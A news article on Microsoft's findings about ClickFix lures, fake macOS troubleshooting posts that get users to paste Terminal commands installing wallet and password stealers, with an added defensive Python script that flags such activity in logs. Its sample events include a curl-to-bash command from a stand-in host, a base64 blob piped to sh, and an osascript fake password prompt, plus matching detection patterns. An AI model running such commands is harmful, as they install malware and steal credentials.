Fake macOS troubleshooting posts are being used to trick users into running Terminal commands that install crypto wallet stealers, according to Microsoft’s Defender Security Research Team.
The campaign has been active since late 2025 and targets people searching for help with storage issues and system errors. Instead of delivering advice, the pages push commands that download malware and expose iCloud data, saved passwords, private files, and wallet keys.
Fake Fixes Turn Terminal Into an Attack Route
The fake guides appear on platforms including Medium, Craft, and Squarespace, where attackers present harmful commands as repair steps. Readers are told to copy and paste code into Terminal, and that action starts the malware installation process without a normal app download.
Researchers described the method as ClickFix, a social engineering tactic that gets the victim to launch the payload themselves. Because the command runs directly inside Terminal, macOS Gatekeeper does not review it the way it would an app opened through Finder. Gatekeeper normally checks code signing and notarization, but this attack never takes that path.
Apple has added a protection in macOS 26.4 that warns users when they try to paste commands flagged as potentially malicious into Terminal. The change targets the exact behavior that ClickFix attacks rely on, although users still need to treat copied commands with caution.
Stealers Target Wallets, Passwords, and Private Files
Microsoft identified three related installer campaigns using a loader, a script, and a helper. Each version gathers sensitive data, creates persistence, and sends stolen information to attacker-controlled servers.
The malware families include AMOS, Macsync, and SHub Stealer. Once active, they search for iCloud and Telegram account data, private documents, small photos, browser usernames, and saved passwords. They also target crypto wallet keys linked to Exodus, Ledger, and Trezor.
The malware can display a fake system prompt that asks for a password to install a helper tool. If the user enters the password, attackers gain broader access to files and system settings. In some cases, researchers found that legitimate wallet apps were removed and replaced with trojanized versions that monitor transactions and steal funds.
Crypto Developers Face Wider Threats
The loader campaign contains a kill switch that stops execution when it detects a Russian keyboard layout. Researchers also observed native macOS utilities such as curl and osascript being used to run payloads in memory, which leaves fewer files on disk for security tools to inspect.
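As an added example (not Microsoft's or Apple's detection logic), the Python triage script below runs over constructed process-execution log lines and flags the ClickFix patterns described on this page: a remote script or decoded blob piped straight into a shell from an interactive Terminal session, and an osascript dialog that asks for a password with hidden input. The log format, parent-process names and sample commands are assumptions made for the example.

```python
import re

# Constructed sample events (not real telemetry), in the assumed shape
# "parent=<process> cmd=<command line>" as an endpoint agent might log them.
SAMPLE_EVENTS = [
    "parent=Terminal cmd=curl -fsSL https://mac-repair-guide.invalid/fix.sh | bash",
    "parent=Terminal cmd=echo ZWNobyBoaQ== | base64 -d | sh",
    "parent=bash cmd=osascript -e 'display dialog \"Helper tool needs your password\" default answer \"\" with hidden answer'",
    "parent=Terminal cmd=curl -O https://example.invalid/report.pdf",
    "parent=Terminal cmd=diskutil list",
    "parent=launchd cmd=/usr/bin/osascript /Library/Scripts/backup.scpt",
]

# Parents that indicate a person typed or pasted the command (the ClickFix path).
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "bash", "zsh", "sh"}

# Each rule: name, pattern, and whether it only matters under an interactive shell.
RULES = [
    ("remote_script_piped_to_shell",
     re.compile(r"\bcurl\b[^|]*\|\s*(?:ba|z)?sh\b"), True),
    ("decoded_blob_piped_to_shell",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:ba|z)?sh\b"), True),
    ("osascript_hidden_password_prompt",
     re.compile(r"\bosascript\b.*display dialog.*hidden answer"), False),
]

def parse_event(line):
    """Split a log line into (parent, command line); None if it is malformed."""
    m = re.fullmatch(r"parent=(\S+) cmd=(.*)", line.strip())
    return (m.group(1), m.group(2)) if m else None

def match_rules(parent, cmd):
    """Return the names of the rules a command trips, honouring the parent constraint."""
    hits = []
    for name, pattern, needs_interactive in RULES:
        if needs_interactive and parent not in INTERACTIVE_PARENTS:
            continue
        if pattern.search(cmd):
            hits.append(name)
    return hits

def scan_events(events):
    """Map each suspicious command line to the rules it triggered."""
    findings = {}
    for line in events:
        parsed = parse_event(line)
        if parsed is None:
            continue  # skip lines that do not follow the assumed format
        hits = match_rules(*parsed)
        if hits:
            findings[parsed[1]] = hits
    return findings

if __name__ == "__main__":
    for cmd, hits in scan_events(SAMPLE_EVENTS).items():
        print(f"{', '.join(hits)}: {cmd}")
```

The plain `curl -O` download and the launchd-driven osascript job are deliberately left unflagged, since the signal in a ClickFix case is the pipe into a shell or the password dialog, not curl or osascript on their own.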
The threat extends beyond fake troubleshooting pages. ANY.RUN researchers linked a Lazarus Group operation called Mach O Man to ClickFix-style lures using fake meeting invitations aimed at fintech and crypto users. Another campaign, PromptMink, showed how attackers used an AI-generated code change and a malicious npm package inside a crypto trading project to reach wallet data and system secrets.